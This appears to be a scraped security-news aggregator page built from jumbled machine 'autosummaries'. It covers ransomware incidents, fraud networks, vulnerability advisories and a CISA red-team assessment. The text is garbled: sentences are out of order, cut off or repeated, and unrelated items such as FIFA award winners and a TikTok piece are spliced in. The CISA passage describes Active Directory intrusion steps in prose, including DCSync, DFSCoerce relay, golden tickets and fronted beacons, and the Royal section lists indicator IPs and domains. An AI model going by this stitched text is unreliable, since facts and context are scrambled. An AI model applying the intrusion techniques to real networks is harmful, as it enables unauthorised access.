No state is safe from data breaches While expectedly, California, with its high concentration of businesses in technology and healthcare recorded the highest number of data breaches at 1,338, the relatively small state of Maryland ranked 5th worst in the nation with 343 breaches. "Autosummary:
"Autosummary:
The activity, which was detected by the BlackBerry Research and Intelligence Team on February 20, 2023, is also said to encompass Ecuador, Chile, and Spain, suggesting a slow expansion of the hacking group"s victimology footprint. "Autosummary:
"Resecurity identified one of the largest investment fraud networks, tracked as Digital Smoke, by size and volume of operations. Resecurity identified one of the largest investment fraud networks by size and volume of operations created to defraud Internet users from Australia, Canada, China, Colombia, the European Union, India, Singapore, Malaysia, United Arab Emirates, Saudi Arabia, […]
The post Resecurity identified the investment scam network ‘Digital Smoke’ appeared first on Security Affairs.
"Autosummary:
Notably, the bad actors have chosen high-demand investment areas to impersonate world-known brands including ABRDN (UK), Blackrock (US), Baxter Medical (US), EvGo (US), Ferrari (Italy), ITC Hotels (India), Eaton Corporation (US/UK), Novuna Business Finance (UK), Tata (India), Valesto Oil (Malaysia), Lloyds Bank (UK), and many more. Resecurity identified one of the largest investment fraud networks by size and volume of operations created to defraud Internet users from Australia, Canada, China, Colombia, the European Union, India, Singapore, Malaysia, United Arab Emirates, Saudi Arabia, Mexico, the U.S. and other regions. "Autosummary:
"Autosummary:
"MortalKombat encrypts various files on the victim machine"s filesystem, such as system, application, database, backup, and virtual machine files, as well as files on the remote locations mapped as logical drives in the victim"s machine," Cisco Talos disclosed earlier this month. "US CISA added an actively exploited vulnerability in the ZK Java Web Framework to its Known Exploited Vulnerabilities Catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a vulnerability, tracked as CVE-2022-36537 (CVSS score: 7.5), in the ZK Java Web open-source framework to its Known Exploited Vulnerabilities Catalog. An attacker can exploit the flaw to retrieve […]
The post CISA adds ZK Java Web Framework bug to Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ZK Java Web Framework) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
Image source, Getty Images Image caption, The Chinese version of TikTok, called Douyin, shares the same format and basic engineering code At the start of TikTok"s ascendancy, there were high-profile cases of censorship on the app: a user in the US had her account suspended for discussing Beijing"s treatment of Muslims in Xinjiang; after a fierce public backlash, TikTok apologised and reinstated the account. Image source, Getty Images Image caption, Shanghai tech giant ByteDance owns TikTok and its sister app Douyin Article seven of China"s National Intelligence Law states that all Chinese organisations and citizens should "support, assist and co-operate" with Chinese intelligence efforts. In November 2022, Christopher Wray, director of the Federal Bureau of Investigation (FBI), told US lawmakers: "The Chinese government could… control the recommendation algorithm, which could be used for influence operations. "Autosummary:
Bitdefender"s decryptor for MortalKombat ransomware (BleepingComputer) Moreover, there’s an option to replace previously decrypted files, products of partially successful decryption attempts, with new, clean versions. "Autosummary:
" The company added that the filed information relates to its "expectations regarding its ability to contain, assess and remediate the ransomware attack and the impact of the ransomware attack on the Corporation"s employees, customers, business, operations or financial results. "The U.S. Marshals Service (USMS) was the victim of a ransomware attack, it is investigating the theft of sensitive information. The U.S. Marshals Service (USMS) announced that a ransomware attack has impacted “a stand-alone USMS system.” The US bureau is investigating the theft of sensitive information following the security breach. The infection occurred on February […]
The post U.S. Marshals Service suffers a ransomware attack appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Antivirus company Bitdefender has released a free decryptor for the recently discovered ransomware family MortalKombat. Good news for the victims of the recently discovered MortalKombat ransomware, the antivirus firm Bitdefender has released a free decryptor that will allow them to recover their file without paying the ransom. Since December 2022, Cisco Talos researchers have been observing an unidentified financially […]
The post Bitdefender released a free decryptor for the MortalKombat Ransomware family appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: News Categories: Ransomware Tags: US Marshalls Tags: WITSEC Tags: usms Tags: ransomware The US Marshals Service has suffered a ransomware attack in which an attacker managed to get hold of sensitive information about staff and fugitives. |
The post US Marshals Service hit by ransomware and data breach appeared first on Malwarebytes Labs.
"Autosummary:
On February 17, 2023, the attacker infiltrated a system that held information about ongoing investigations, including personally identifiable information (PII) of fugitives, staff, and third parties. Investigation According to Drew Wade, spokesperson for the USMS: "Shortly after that discovery, the USMS disconnected the affected system, and the Department of Justice initiated a forensic investigation.Posted: February 28, 2023 by The US Marshals Service has suffered a ransomware attack in which an attacker managed to get hold of sensitive information about staff and fugitives. "And that’s just the tip of the iceberg when it comes to the trends that defined the cyberthreat landscape in the final four months of 2022.
The post ESET Research Podcast: Ransomware trashed data, Android threats soared in T3 2022 appeared first on WeLiveSecurity
"Autosummary:
"Autosummary:
"Autosummary:
"In this Help Net Security video, Caroline Wong, Chief Strategy Officer at Cobalt, offers valuable insight into what leaders can do to instill stronger cybersecurity practices from the bottom up and prevent breaches.
The post Stay one step ahead: Cybersecurity best practices to prevent breaches appeared first on Help Net Security.
"Autosummary:
"The threat landscape and organizations’ attack surface are constantly transforming, and cybercriminals’ ability to design and adapt their techniques to suit this evolving environment continues to pose significant risk to businesses of all sizes, regardless of industry or geography. Destructive APT-like wiper malware spreads wide Analyzing wiper malware data reveals a trend of cyber adversaries consistently using destructive attack techniques against their targets. It also shows that with the lack of borders on the internet, … More
The post Wiper malware goes global, destructive attacks surge appeared first on Help Net Security.
"Autosummary:
Specifically, in the second half of 2022, significant targets of Mirai included managed security service providers (MSSPs), the telco/carrier sector, and the manufacturing sector, which is known for its pervasive operational technology (OT). It is possible that the long-tail legacy of this criminal group is still perpetuating, or the code has simply been built upon, changed, and re-released, demonstrating the importance of global partnerships across all types of organizations to permanently dismantle criminal operations.To counter, adversaries are augmenting with more reconnaissance techniques and deploying more sophisticated attack alternatives to enable their destructive attempts with APT-like threat methods such as wiper malware or other advanced payloads,” said Derek Manky, Chief Security Strategist & Global VP Threat Intelligence, FortiGuard Labs. "Resecurity identified one of the largest investment fraud networks by size and volume of operations created to defraud Internet users from Australia, Canada, China, Colombia, European Union, India, Singapore, Malaysia, United Arab Emirates, Saudi Arabia, Mexico, the U.S. and other regions. The bad actors operating as an organized crime syndicate developed a massive infrastructure to impersonate popular Fortune 100 corporations from the U.S and the U.K by using their brands and market reputation to defraud … More
The post Resecurity identified the investment scam network Digital Smoke appeared first on Help Net Security.
"Autosummary:
Notably, the bad actors have chosen high-demand investment areas to impersonate world-known brands including ABRDN (UK), Blackrock (US), Baxter Medical (US), EvGo (US), Ferrari (Italy), ITC Hotels (India), Eaton Corporation (US/UK), Novuna Business Finance (UK), Tata (India), Valesto Oil (Malaysia), Lloyds Bank (UK), and many more.Resecurity identified one of the largest investment fraud networks by size and volume of operations created to defraud Internet users from Australia, Canada, China, Colombia, European Union, India, Singapore, Malaysia, United Arab Emirates, Saudi Arabia, Mexico, the U.S. and other regions. "Newly released Federal Trade Commission (FTC) data shows that consumers reported losing nearly $8.8 billion to fraud in 2022, an increase of more than 30 percent over the previous year. Losing money to investment and imposter scams Consumers reported losing more money to investment scams – more than $3.8 billion—than any other category in 2022. That amount more than doubles the amount reported lost in 2021. The second-highest reported loss amount came from imposter scams, … More
The post FTC reveals alarming increase in scam activity, costing consumers billions appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"QNAP Systems, the Taiwanese manufacturer of popular NAS and other on-premise storage, smart networking and video devices, has launched a bug bounty program. QNAP’s NAS devices, in particular, have been getting hit in the last few years by information-stealing malware, bitcoin-mining malware, and ransomware, usually delivered by exploiting vulnerabilities. About the QNAP bug bounty program “Our security bounty program only accepts security vulnerabilities in QNAP products and services. Out-of-scope vulnerabilities will not be eligible for … More
The post QNAP starts bug bounty program with rewards up to $20,000 appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Researchers detailed a new wave of attacks distributing the PlugX RAT disguised as a legitimate Windows debugger tool. Trend Micro uncovered a new wave of attacks aimed at distributing the PlugX remote access trojan masqueraded as an open-source Windows debugger tool called x32dbg. The legitimate tool allows to examine kernel-mode and user-mode code, crash dumps, or CPU […]
The post PlugX Trojan disguised as a legitimate Windows open-source tool in recent attacks appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Since the desired user role can be provided by the user, but is not validated properly on the server side, it can be set to the "administrator" value in order to create a new account that has the administrator user role," PatchStack researcher D. Jong told BleepingComputer. "Autosummary:
A variety of malicious payloads Currently, RIG EK primarily pushes information-stealing and initial access malware, with Dridex being the most common (34%), followed by SmokeLoader (26%), RaccoonStealer (20%), Zloader (2.5%), Truebot (1.8%), and IcedID (1.4%)., the most impacted countries are Germany, Italy, France, Russia, Turkey, Saudi Arabia, Egypt, Algeria, Mexico, and Brazil. "Nearly every day, software updates of some kind roll out for our systems. From operating systems to antivirus software, to cloud services, to hardware devices, virtually none of the technology we use is static. And with these updates come side effects and problems that sometimes take a while to get fixed.
I recently found an interesting bug that hasn’t gotten a lot of attention when I purchased a Lexmark multi-function printer. As part of the installation process, I went online to download the latest printer driver. (I always recommend going to a vendor website to grab the latest drivers because, after all, the latest software should have the latest fixes, right?) I was able to set up the printer to print, scan, and electronically fax and figured I was done for the day.
Autosummary:
Here’s what the error looks like: Faulting application name: mstsc.exe, version: 10.0.19041.2075, time stamp: 0x63f96292 Faulting module name: LMFX1N4Z.DLL, version: 0.0.1.0, time stamp: 0x61b8cf09 Exception code: 0xc0000005 Fault offset: 0x0000000000038ac3 Faulting process id: 0x2b30 Faulting application start time: 0x01d948e5ef27f462 Faulting application path: C:\WINDOWS\system32\mstsc.exe Faulting module path: C:\WINDOWS\system32\spool\DRIVERS\x64\3\LMFX1N4Z.DLL Report Id: 5b058189-0b5a-4284-a62d-c583bbe5a7da Faulting package full name: Faulting package-relative application ID: Included in that event is the clue I needed.Searching online, I found another computer user facing a similar issue, but with a virtual machine, not a remote desktop client.From operating systems to antivirus software, to cloud services, to hardware devices, virtually none of the technology we use is static. "Autosummary:
"Autosummary:
Other browser flaws weaponized by the malware include CVE-2013-2551, CVE-2014-6332, CVE-2015-0313, CVE-2015-2419, CVE-2016-0189, CVE-2018-8174, CVE-2019-0752, and CVE-2020-0674. According to data collected by PRODAFT, 45% of the successful infections in 2022 leveraged CVE-2021-26411, followed by CVE-2016-0189 (29%), CVE-2019-0752 (10%), CVE-2018-8174 (9%), and CVE-2020-0674 (6%). "Autosummary:
Creating scheduled tasks through EX-22"s panel (CYFIRMA) Through the service"s web panel, cybercriminals can also set scheduled tasks, update agents to a new version, change a campaign"s configuration, or create new campaigns. Telegram channel set up by EX-22 authors (CYFIRMA) By the end of the year, the threat actors announced new features that helped conceal traffic on compromised devices, indicating that the framework was under active development. "Autosummary:
Alexia Putellas The Best men"s goalkeeper: Emiliano Martinez The Best women"s goalkeeper: Mary Earps The Best men"s coach: Lionel Scaloni The Best women"s coach: Sarina Wiegman The Best Puskas award: Marcin Oleksy The Best fan award: Argentina fans The Best fair play award: Luka Lochoshvili "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Google Protected Computing: Ensuring privacy and safety of data regardless of location In this Help Net Security interview, Royal Hansen, VP of Engineering for Privacy, Safety, and Security at Google, talks about Protected Computing, the impact of data protection regulations, and privacy in general. Users looking for ChatGPT apps get malware instead The massive popularity of OpenAI’s chatbot ChatGPT has … More
The post Week in review: ChatGPT and cybersecurity, hidden vulnerabilities in Docker containers appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Google Protected Computing: Ensuring privacy and safety of data regardless of location In this Help Net Security interview, Royal Hansen, VP of Engineering for Privacy, Safety, and Security at Google, talks about Protected Computing, the impact of data protection regulations, and privacy in general. "The group of hacktivists CH01 defaced at least 32 Russian websites to mark a protest over the one-year anniversary of the Russian invasion A group of hacktivists that goes online with the moniker CH01 defaced at least 32 Russian websites to mark a protest over the one-year anniversary of the Russian invasion. The news was […]
The post Pro-Ukraine hackers CH01 defaced tens of Russian websites on the invasion anniversary appeared first on Security Affairs.
"Autosummary:
#Anonymous their affiliates and Pro-Ukrainian hackers have defaced at least 32 websites, showing the #Kremlin on fire, to mark a protest over the one-year anniversary of the #Russian invasion of #Ukraine during their #OpRussia campaign #WeStandWithUkraine #FckPutin pic.twitter.com/PUs0MiBeXo — Anonymous Operations (@AnonOpsSE) February 25, 2023 The hackers have uploaded a video showing the Kremlin burning on the defaced websites. "The producers of fruit and vegetables Dole Food Company disclosed a ransomware attack that impacted its operations. Dole Food Company is an Irish agricultural multinational corporation, it is one of the world’s largest producers of fruit and vegetables, operating with 38,500 full-time and seasonal employees who supply some 300 products in 75 countries. Dole reported 2021 revenues of $6.5 billion. The […]
The post Ransomware attack on food giant Dole Food Company blocked North America production appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Dole Food Company) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"The campaign was found to have delivered several types of malware including Redline Stealer, AgentTesla, Eternity, Blackmoon and Philadelphia Ransomware," the researchers say. "Autosummary:
Dish Network website, phones, apps offline Dish Network websites and apps including Dish.com, DishWireless.com, and Dish Anywhere are facing a prolonged outage with customers unable to get to their accounts or stream TV online: Dish.com website offline amid "internal system issue" (BleepingComputer) BleepingComputer also observed the Dish Anywhere Android app experiencing connection issues: Dish Anywhere app unreachable (BleepingComputer) Customers have also reported experiencing problems when attempting to pay their bills or calling customer service centers." Employees report it"s a cyberattack A source in touch with a Dish Network employee told BleepingComputer that the network "has been hit" (by a cyber attack) with employees seeing "blank icons" on their Desktop—something that typically occurs after a ransomware infection encrypts the victim"s files. "Dariy Pankov, a Russian VXer behind the NLBrute malware, has been extradited to the United States from Georgia. The Russian national Dariy Pankov, aka dpxaker, is suspected to be the author of the NLBrute malware. The man has been extradited to the United States from Georgia. “Pankov, a citizen and resident of Russia, was taken […]
The post The alleged author of NLBrute Malware was extradited to US from Georgia appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, NLBrute) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "By 2025, nearly half of cybersecurity leaders will change jobs, 25% for different roles entirely due to multiple work-related stressors, according to Gartner. “Cybersecurity professionals are facing unsustainable levels of stress,” said Deepti Gopal, Director Analyst, Gartner. “CISOs are on the defense, with the only possible outcomes that they don’t get hacked or they do. The psychological impact of this directly affects decision quality and the performance of cybersecurity leaders and their teams,” Gopal added. … More
The post Employees bypass cybersecurity guidance to achieve business objectives appeared first on Help Net Security.
"Autosummary:
“Friction that slows down employees and leads to insecure behavior is a significant driver of insider risk,” said Paul Furtado, VP Analyst, Gartner. "Autosummary:
"Last year, Microsoft announced automatic attack disruption capabilities in Microsoft 365 Defender, its enterprise defense suite. On Wednesday, it announced that these capabilities will now help organizations disrupt two common attack scenarios: BEC (business email compromise) and human-operated ransomware attacks. Reaction speed is paramount for disrupting attacks A fast defensive response to initiated cyber attacks is becoming increasingly crucial for organizations: According to IBM Security’s X-Force team, the average time to complete a ransomware attack … More
The post Microsoft announces automatic BEC, ransomware attack disruption capabilities appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Its AI algorithms analyze and classify web content in real-time, which allows web filtering software to quickly identify and block websites that contain harmful content, such as malware, phishing scams, and inappropriate material. However, deploying AI in business cybersecurity can be a complex and challenging process, and there are many potential pitfalls to avoid to ensure that AI is effectively integrated into your cybersecurity strategy. "Autosummary:
"Experts warn of threat actors actively exploiting the critical CVE-2022-47966 (CVSS score: 9.8) flaw in Zoho ManageEngine. Multiple threat actors are actively exploiting the Zoho ManageEngine CVE-2022-47966 (CVSS score: 9.8) in attacks in the wild, Bitdefender Labs reported. “Starting on January 20 2023, Bitdefender Labs started to notice a global increase in attacks using the ManageEngine exploit CVE-2022-47966.” reads the […]
The post Hackers are actively exploiting CVE-2022-47966 flaw in Zoho ManageEngine appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Zoho ManageEngine) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"Categories: Business CRN named Malwarebytes one of the “Coolest Endpoint And Managed Security Companies” on the 2023 CRN Security 100. |
The post Malwarebytes wins 2023 CRN "Coolest Endpoint And Managed Security Companies" award appeared first on Malwarebytes Labs.
"Autosummary:
By featuring Malwarebytes on their list of key cybersecurity vendors for 2023, CRN recognizes the strides we’ve made to best serve our channel partners in the past year, including: Expanding our partner network to more than 3,000 global MSP partners and over 250 percent growth YoY Forming new strategic partnerships with Addigy, Atera, ConnectWise, GCN Group, Kaseya/Datto, Sherweb, TeamViewer, and Pax8, among others. And on the Value Added Reseller (VAR) front: Continuing to strengthen key partnerships with distribution and partners, including TD Synnex, Carahsoft, CDW, SHI, Insight, and Howard Technologies . Malwarebytes OneView dashboard view Constantly expanding Malwarebytes has only continued to build upon both OneView for MSPs and Nebula for Value-Added Resellers (VARs), adding three new modules that simplify breach prevention within the same cloud interface MSPs already trust for detection and remediation: Vulnerability and Patch Management Enables MSPs to take control of their full vulnerability assessment and patching process, helping ensure defenses are up to date across their clients’ environments. "Defence Cyber Marvel 2 (DCM2) is the largest Western Europe-led cyber exercise that took place in Tallinn with 34 teams from 11 countries. The Defence Cyber Marvel 2 (DCM2) is the largest training exercise organised by the Army Cyber Association to allow personnel from across the Armed Forces to build their skills within the cyber […]
The post UK won the Military Cyberwarfare exercise Defence Cyber Marvel 2 (DCM2) appeared first on Security Affairs.
"Autosummary:
34 teams from 11 countries, including India, Italy, Ghana, Japan, US, Ukraine, Kenya, and Oman, have taken part in a live-fire cyber battle that lasted seven days. "Autosummary:
On Workstation 1, the team leveraged a modified SharpHound collector, ldapsearch , and command-line tool, dsquery , to query and scrape AD information, including AD users [T1087.002], computers [T1018], groups [T1069.002], access control lists (ACLs), organizational units (OU), and group policy objects (GPOs) [T1615]. As a long-term effort, CISA recommends organizations prioritize implementing a more modern, Zero Trust network architecture that: Leverages secure cloud services for key enterprise security capabilities (e.g., identity and access management, endpoint detection and response, policy enforcement).[T1136.001] Account Manipulation [T1098 ] Intrusion Detection or Prevention Systems Endpoint Protection Platform Web Proxy Logs Detect and identify source IP and source process of malicious traffic Investigate destination IP address Triage compromised host Develop response plan None Local Admin User Account Creation (server) Create a local administrator account on a target server system. Figure 1: Red Team Cyber Threat Activity: Initial Access and Lateral Movement While traversing the network, the team varied their lateral movement techniques to evade detection and because the organization had non-uniform firewalls between the sites and within the sites (within the sites, firewalls were configured by subnet). Lateral Movement, Credential Access, and Persistence The red team moved laterally [TA0008] from Workstation 2 to the Site 1 SharePoint server and had SYSTEM level access to the Site 1 SharePoint server, which had Unconstrained Delegation enabled.The user employed a KeePass password manager that the team was able to use to obtain passwords for other internal websites, a kernel-based virtual machine (KVM) server, virtual private network (VPN) endpoints, firewalls, and another KeePass database with credentials. The team then used the TGT to harvest advanced encryption standard (AES)-256 hashes via DCSync [T1003.006] for the krbtgt account and several privileged accounts—including domain admins, workstation admins, and a system center configuration management (SCCM) service account (SCCM Account 1).Intrusion Detection or Prevention Systems Endpoint Protection Platform Web Proxy Logs Detect and identify source IP and source process of malicious traffic Investigate destination IP address Triage compromised host Develop response plan None Trigger Host-Based Protection—Domain Controller Upload and execute a well-known (e.g., with a signature) malicious file to a target DC system to generate host-based alerts.Platform Detect target hosts and ports Identify associated scanning process Analyze scanning host once detected Develop response plan None Comprehensive Active Directory and Host Enumeration Perform AD enumeration by querying all domain objects from the DC; and enumerating trust relationships within the AD Forest, user accounts, and current session information from every domain computer (Workstation and Server). Post-Exploitation Activity: Gaining Access to SBSs With persistent, deep access established across the organization’s networks and subnetworks, the red team began post-exploitation activities and attempted to access SBSs. Plan for Potential Access to SBS 1 Conducting open-source research [1591.001], the team identified that SBS 1 and 2 assets and associated management/upkeep staff were located at Sites 5 and 6, respectively.Phishing Lateral movement reuse Generation and use of the golden ticket Anomalous LDAP traffic Anomalous internal share enumeration Unconstrained Delegation server compromise DCSync Anomalous account usage during lateral movement Anomalous outbound network traffic Anomalous outbound SSH connections to the team’s cloud servers from workstations Most of the red team’s Phase II actions failed to provoke a response from the people, processes, and technology defending the organization’s network.Specifically, the team used the Sharepoint server’s machine NTLM hash and DFSCoerce ’s python script ( DFSCoerce.py ) to prompt DC authentication to the server, and they captured the incoming DC TGT using Rubeus [T1550.002], [T1557.001].While in the MDM MySQL database, Elevating the selected MDM user’s account privileges to administrator privileges, and Modifying the user’s account by adding Create Policy and Delete Policy permissions [T1098], [T1548].Windows Service [T1543.003] Windows Event Logs Detect account compromise Analyze compromised host Develop response plan None Domain Admin Lateral Movement—Workstation to Domain Controller Use a previously compromised domain admin account to upload and execute a payload via SMB and Windows Service Creation, respectively, on a target DC. Introduction CISA has authority to, upon request, provide analyses, expertise, and other technical assistance to critical infrastructure owners and operators and provide operational and timely technical assistance to Federal and non-Federal entities with respect to cybersecurity risks.The meeting invite took them to a red team-controlled domain [T1566.002] with a button, which, when clicked, downloaded a “malicious” ISO file [T1204].The organization failed to detect lateral movement, persistence, and C2 activity via their intrusion detection or prevention systems, endpoint protection platform, web proxy logs, and Windows event logs.The organization failed to detect lateral movement, persistence, and C2 activity via their intrusion detection or prevention systems, endpoint protection platform, web proxy logs, and Windows event logs. CISA is releasing this Cybersecurity Advisory (CSA) detailing the red team’s tactics, techniques, and procedures (TTPs) and key findings to provide network defenders of critical infrastructure organizations proactive steps to reduce the threat of similar activity from malicious cyber actors.Using the same methodology as described by the steps in the Plan for Potential Access to SBS 1 section above, the team gained interactive root access to two Site 6 SBS 2-connected workstations: a software engineering workstation (Workstation 5) and a user administrator workstation (Workstation 6).One user triggered the red team’s payload, which led to installation of a persistent beacon on the user’s workstation (Workstation 2), giving the team persistent access to Workstation 2.This technique, which also leverages CDNs, allows the beacon to appear to connect to third-party domains, such as nytimes.com, when it is actually connecting to the team’s redirect server.If NTLM must be enabled, enable Extended Protection for Authentication (EPA) to prevent some NTLM-relay attacks, and implement SMB signing to prevent certain adversary-in-the-middle and pass-the-hash attacks CPG 3.4]. Phase II: Red Team Measurable Events Activity The red team executed 13 measurable events designed to provoke a response from the people, processes, and technology defending the organization’s network. The team gained root access to workstations connected to MDM 1—specifically, the team accessed Workstation 4—by: Selecting an MDM user from the plaintext credentials in PowerShell scripts on MDM 1.The team gained persistent access to the organization’s network, moved laterally across the organization’s multiple geographically separated sites, and eventually gained access to systems adjacent to the organization’s sensitive business systems (SBSs). However, the team assesses that by using Secure Shell (SSH) session socket files (see below), they could have accessed any hosts available to the users whose workstations were compromised. REFERENCES [1] Bleeping Computer: New DFSCoerce NTLM Relay attack allows Windows domain takeover APPENDIX: MITRE ATT&CK TACTICS AND TECHNIQUES See Table 3 for all referenced red team tactics and techniques in this advisory. Attempts to Access SBS 2 Conducting open-source research, the team identified an organizational branch [T1591] that likely had access to SBS 2.Consider using red team tools, such as SharpHound, for AD enumeration to identify users with excessive privileges and misconfigured hosts (e.g., with Unconstrained Delegation enabled).However, a multifactor authentication (MFA) prompt prevented the team from achieving access to one SBS, and Phase I ended before the team could implement a seemingly viable plan to achieve access to a second SBS. Table 1: Measurable Events Measurable Event Description MITRE ATT&CK Technique(s) Expected Detection Points Expected Network Defender Reactions Reported Reactions Internal Port Scan Launch scan from inside the network from a previously gained workstation to enumerate ports on target workstation, server, and domain controller system(s). Despite having a mature cyber posture, the organization did not detect the red team’s activity throughout the assessment, including when the team attempted to trigger a security response. "Autosummary:
REFERENCES [1] Royal Rumble: Analysis of Royal Ransomware (cybereason.com) [2] DEV-0569 finds new ways to deliver Royal ransomware, various payloads - Microsoft Security Blog [3] 2023-01: ACSC Ransomware Profile - Royal | Cyber.gov.au ACKNOWLEDGEMENTS Recorded Future, Coveware, Digital Asset Redemption, Q6, and RedSense contributed to this CSA.November 2022 68.83.169[.]91 November 2022 81.184.181[.]215 November 2022 82.12.196[.]197 November 2022 98.143.70[.]147 November 2022 140.82.48[.]158 December 2022 147.135.36[.]162 December 2022 147.135.11[.]223 December 2022 152.89.247[.]50 December 2022 172.64.80[.]1 December 2022 179.43.167[.]10 December 2022 185.7.214[.]218 December 2022 193.149.176[.]157 December 2022 193.235.146[.]104 December 2022 209.141.36[.]116 December 2022 45.61.136[.]47 December 2022 45.8.158[.]104 December 2022 5.181.234[.]58 December 2022 5.188.86[.]195 December 2022 77.73.133[.]84 December 2022 89.108.65[.]136 December 2022 94.232.41[.]105 December 2022 47.87.229[.]39 January 2023 Malicious Domain Last Observed ciborkumari[.]xyz October 2022 sombrat[.]com October 2022 gororama[.]com November 2022 Additional details requested include: a targeted company Point of Contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, host and network based indicators.Batch files create a new admin user [T1078.002], force a group policy update, set pertinent registry keys to auto-extract [T1119] and execute the ransomware, monitor the encryption process, and delete files upon completion—including Application, System, and Security event logs [T1070.001].Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI. REPORTING FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Royal actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.According to open-source reporting, victims have unknowingly installed malware that delivers Royal ransomware after receiving phishing emails containing malicious PDF documents [T1566.001], and malvertising [T1566.002].[2] According to third-party reporting, Royal actors most commonly (in 66.7% of incidents) gain initial access to victim networks via successful phishing emails [T1566]. Encryption Before starting the encryption process, Royal actors: Use Windows Restart Manager to determine whether targeted files are currently in use or blocked by other applications [T1486].[1] Use Windows Volume Shadow Copy service ( vssadmin.exe ) to delete shadow copies to prevent system recovery.[1] FBI has found numerous batch ( .bat ) files on impacted systems which are typically transferred as an encrypted 7zip file.[CPG 7.3] in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).[CPG 7.3] in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).134.35.9[.]209 November 2022 139.195.43[.]166 November 2022 139.60.161[.]213 November 2022 148.213.109[.]165 November 2022 163.182.177[.]80 November 2022 181.141.3[.]126 November 2022 181.164.194[.]228 November 2022 185.143.223[.]69 November 2022 186.64.67[.]6 November 2022 186.86.212[.]138 November 2022 190.193.180[.]228 November 2022 196.70.77[.]11 November 2022 197.11.134[.]255 November 2022 197.158.89[.]85 November 2022 197.204.247[.]7 November 2022 197.207.181[.]147 "DarkLight and Resecurity partnership will give DarkLight access to Resecurity’s threat intelligence solution called Context, which identifies indications of cyber intrusions and data breaches for clients. This will give DarkLight the ability to provide comprehensive risk assessments tailored to each client’s unique business context. DarkLight’s knowledge driven AI platform, Cyio, was originally developed at the Pacific Northwest National Laboratory (one of the Department of Energy’s national labs) to support an NSA effort. Clients can analyze … More
The post DarkLight partners with Resecurity to improve enterprise cybersecurity posture appeared first on Help Net Security.
"Autosummary:
"Malwarebytes has added Malwarebytes Application Block to its Nebula and OneView endpoint protection platforms. The new threat prevention module helps resource-strained security teams guard against unsafe third-party Windows applications, meet key compliance requirements and encourage productivity without adding management complexity. Third-party apps pose a serious security threat to businesses with limited IT resources and expertise. Vulnerabilities in Android applications have led to more than one million malicious application downloads, with researchers frequently uncovering malware-ridden applications … More
The post Malwarebytes Application Block restricts access to outdated and unsafe apps appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"The economic downturn predicted for 2023 will lead to layoffs but cybersecurity workers will be least affected, says the latest (ISC)² report. Also, as soon as things get better, they will likely be the first ones to get (re)hired. Execs have realized the importance of cybersecurity There have been massive layoffs by tech and other companies in the last few months. In December 2022, (ISC)² polled 1,000 C-suite executives from Germany, Japan, Singapore, the UK … More
The post Cybersecurity layoffs in 2023: What to expect? appeared first on Help Net Security.
"Autosummary:
And when executives evaluate who will be laid off, job performance will be the most important factor (50%), followed by expertise/skill set (49%), skill redundancy (43%), diversity/team composition (37%), and salary (30%). "Autosummary:
With no technical tools or expertise, the developer could retrieve FirstAm records dating back to 2003 – 885 million in total, many containing the kinds of sensitive data disclosed in real estate dealings, like bank details, social security numbers, and of course, names and addresses.It didn"t end there, since "users" biometric digital fingerprints used for authentication, along with users" personal data (names, dates of birth, etc.), were exposed in the cloud."Over three-quarters leaked AWS tokens, enabling outside parties to access private cloud services, and nearly half leaked tokens that further enabled "full access to numerous, often millions, of private files. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Symantec reports that the attackers perform various actions post-compromise, including: checking the IP address of the breached system disabling endpoint protection products by stopping their services deploying malware that can scan for specific files and exfiltrate them as ZIP archives clearing Sysmon logs and eventlogs to wipe the traces of the malicious activity creating a scheduled task ("network service") to list file names Symantec"s investigation revealed that along with its backdoor, Clasiopa also used legitimate software such as Agile DGS and Agile FD, signed with old certificates. "Autosummary:
Another, a variant of the Spynote malware, steals sensitive information from users" Android devices, including call logs, contacts, SMS messages. "Autosummary:
